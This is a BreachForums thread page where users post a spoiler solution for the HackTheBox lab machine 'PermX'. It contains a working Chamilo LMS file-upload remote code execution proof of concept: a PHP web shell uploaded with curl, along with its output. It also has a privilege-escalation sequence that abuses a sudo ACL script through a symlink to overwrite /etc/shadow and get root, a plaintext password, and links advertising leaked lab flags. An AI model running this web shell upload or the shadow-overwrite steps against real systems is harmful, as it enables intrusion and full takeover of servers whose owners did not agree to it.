JOIN BREACHFORUMS TELEGRAM
HTB - PermX
by trevor69000 - Saturday July 6, 2024 at 07:40 PM
Banned

Posts: 219
Threads: 14
Joined: Apr 2024
Reputation: 17
#11
Jul 06, 2024, 09:19 PM
guys cd /home/mtz
ln -s / root
sudo /opt/acl.sh mtz rwx /home/mtz/root/etc/shadow

after that overwrite /etc/shadow

echo 'root:$y$j9T$RUjBgvOODKC9hyu5u7zCt0$Vf7nqZ4umh3s1N69EeoQ4N5zoid6c2SlGb1LvBFRxSB:19742:0:99999:7:::
daemon:*:19579:0:99999:7:::
bin:*:19579:0:99999:7:::
sys:*:19579:0:99999:7:::
sync:*:19579:0:99999:7:::
games:*:19579:0:99999:7:::
man:*:19579:0:99999:7:::
lp:*:19579:0:99999:7:::
mail:*:19579:0:99999:7:::
news:*:19579:0:99999:7:::
uucp:*:19579:0:99999:7:::
proxy:*:19579:0:99999:7:::
www-data:*:19579:0:99999:7:::
backup:*:19579:0:99999:7:::
list:*:19579:0:99999:7:::
irc:*:19579:0:99999:7:::
gnats:*:19579:0:99999:7:::
nobody:*:19579:0:99999:7:::
_apt:*:19579:0:99999:7:::
systemd-network:*:19579:0:99999:7:::
systemd-resolve:*:19579:0:99999:7:::
messagebus:*:19579:0:99999:7:::
systemd-timesync:*:19579:0:99999:7:::
pollinate:*:19579:0:99999:7:::
sshd:*:19579:0:99999:7:::
syslog:*:19579:0:99999:7:::
uuidd:*:19579:0:99999:7:::
tcpdump:*:19579:0:99999:7:::
tss:*:19579:0:99999:7:::
landscape:*:19579:0:99999:7:::
fwupd-refresh:*:19579:0:99999:7:::
usbmux:*:19742:0:99999:7:::
mtz:$y$j9T$RUjBgvOODKC9hyu5u7zCt0$Vf7nqZ4umh3s1N69EeoQ4N5zoid6c2SlGb1LvBFRxSB:19742:0:99999:7:::
lxd:!:19742::::::
mysql:!:19742:0:99999:7:::' > /etc/shadow

su root
password : 03F6lY3uXAP2bkW8

cat /root/root.txt

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed
Reply
Breached
Member
Posts: 5
Threads: 0
Joined: Apr 2024
Reputation: 0
#12
Jul 06, 2024, 09:30 PM
(Jul 06, 2024, 08:10 PM)osamy7593 Wrote:
(Jul 06, 2024, 07:58 PM)fuckhackthebox Wrote: https://starlabs.sg/advisories/23/23-4220/

$ echo '<?php system("id"); ?>' > rce.php
$ curl -F 'bigUploadFile=@rce.php' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
The file has successfully been uploaded.
$ curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/rce.php'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

bro how can u know that the parameter is action?
It is in the PoC bottom of page.
Reply
Banned

Posts: 219
Threads: 14
Joined: Apr 2024
Reputation: 17
#13
Jul 06, 2024, 09:34 PM
(Jul 06, 2024, 09:30 PM)anon54321 Wrote:
(Jul 06, 2024, 08:10 PM)osamy7593 Wrote:
(Jul 06, 2024, 07:58 PM)fuckhackthebox Wrote: https://starlabs.sg/advisories/23/23-4220/

$ echo '<?php system("id"); ?>' > rce.php
$ curl -F 'bigUploadFile=@rce.php' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
The file has successfully been uploaded.
$ curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/rce.php'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

bro how can u know that the parameter is action?
It is in the PoC bottom of page.

in the middle

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed
Reply
MVP User
MVP
Posts: 29
Threads: 1
Joined: Aug 2024
Reputation: 20

MVP
#14
Aug 30, 2024, 03:03 PM
password of mtz:

03F6lY3uXAP2bkW8
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 20 2,438 1 hour ago
Last Post: op334
Heart [FREE] HackTheBox All Cheatsheets Tamarisk 3 366 1 hour ago
Last Post: op334
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 369 91,779 8 hours ago
Last Post: sabbyahmed
  CBBH Write Ups hiddenhacker 22 6,209 Yesterday, 06:39 AM
Last Post: Usercomplex
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 86 7,788 Apr 28, 2026, 11:39 PM
Last Post: my4ri0d0

Forum Jump:


 Users browsing this forum: 1 Guest(s)